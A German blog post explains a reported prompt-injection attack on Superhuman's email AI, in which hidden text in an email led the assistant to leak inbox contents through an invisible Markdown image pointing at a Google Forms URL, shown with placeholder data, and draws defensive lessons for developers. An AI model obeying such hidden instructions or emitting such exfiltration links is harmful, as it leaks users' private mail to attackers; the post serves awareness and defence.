Wie eine versteckte Anweisung in einer E-Mail deine gesamte Inbox stehlen kann

Stell dir vor: Du bittest deine E-Mail-KI, die letzten Nachrichten zusammenzufassen. Was du nicht weißt: Eine harmlos aussehende E-Mail enthält versteckte Anweisungen, die die KI dazu bringen, sensible Inhalte aus deiner gesamten Inbox – Bank, Anwalt, Arzt – an einen Angreifer zu übermitteln. Genau das ist bei Superhuman passiert, wie Simon Willison berichtet.

Eine KI-generierte Übersicht des Workflows!

Der Angriff im Detail

Der Sicherheitsforscher von PromptArmor hat einen bemerkenswerten Angriffsvektor aufgedeckt:

Die Falle: Ein Angreifer schickt eine E-Mail mit verstecktem Text (Prompt Injection). Der Text ist für dich unsichtbar, aber die KI liest ihn.
Der Trigger: Du fragst Superhuman's KI Fass meine letzten E-Mails zusammen.
Die Manipulation: Die KI folgt den versteckten Anweisungen und liest sensible E-Mails aus deiner Inbox.
Die Exfiltration: Die KI verpackt die Daten in eine URL und bettet sie als unsichtbares Markdown-Bild ein:

![](https://docs.google.com/forms/d/xxx/formResponse?entry.123=GEHEIME_DATEN)

Der Diebstahl: Dein Browser lädt das "Bild" – aber Google Forms speichert stattdessen die übermittelten Daten.

Das Perfide: Du merkst nichts. Du siehst nur die normale Zusammenfassung.

Warum hat das funktioniert?

Drei Faktoren kamen zusammen:

CSP erlaubte docs.google.com: Die Content Security Policy ließ Bilder von dieser Domain zu – klingt ja vertrauenswürdig.
Google Forms als Datensenke: Forms nimmt Daten auch per GET-Request an, also einfach über URL-Parameter.
KI mit vollem Zugriff: Der Assistent hatte Leserechte auf alle E-Mails und konnte Markdown ausgeben.

Was Entwickler daraus lernen sollten

Dieser Fall zeigt ein grundsätzliches Problem bei KI-Integrationen:

Jede Kombination aus KI + externe Inhalte + Rich-Text-Rendering ist ein potenzielles Exfiltrations-Risiko.

Konkret:

Content Security Policy (CSP) allein reicht nicht. Auch "vertrauenswürdige" Domains können unbeabsichtigt als Datensenke funktionieren.
Markdown/HTML-Rendering ist gefährlich, wenn die KI Zugriff auf sensible Daten hat.
Prompt Injections sind real. Wenn deine KI externe Inhalte verarbeitet, musst du damit rechnen, dass Angreifer versuchen, sie zu manipulieren.

Was Superhuman richtig gemacht hat

Credit where credit is due: Superhuman hat das Problem laut promptamor.com als High-Priority-Incident behandelt und schnell einen Fix ausgerollt. Das ist die richtige Reaktion – viele Unternehmen hätten das Problem heruntergespielt oder langsamer reagiert.

Fazit

KI-Features in Produkten sind verlockend, aber sie eröffnen völlig neue Angriffsvektoren. Als Entwickler müssen wir verstehen: Wenn wir einer KI Zugriff auf sensible Daten geben und sie gleichzeitig externe Inhalte verarbeiten lassen, bauen wir potenzielle Exfiltrationspfade.

Die Frage ist nicht ob Angreifer Prompt Injections versuchen werden – sondern wann.

Quelle: PromptArmor Research + simonwillison.net

Der Angriff im Detail

Warum hat das funktioniert?

Was Entwickler daraus lernen sollten

Was Superhuman richtig gemacht hat

Fazit

Bleib auf dem Laufenden 📧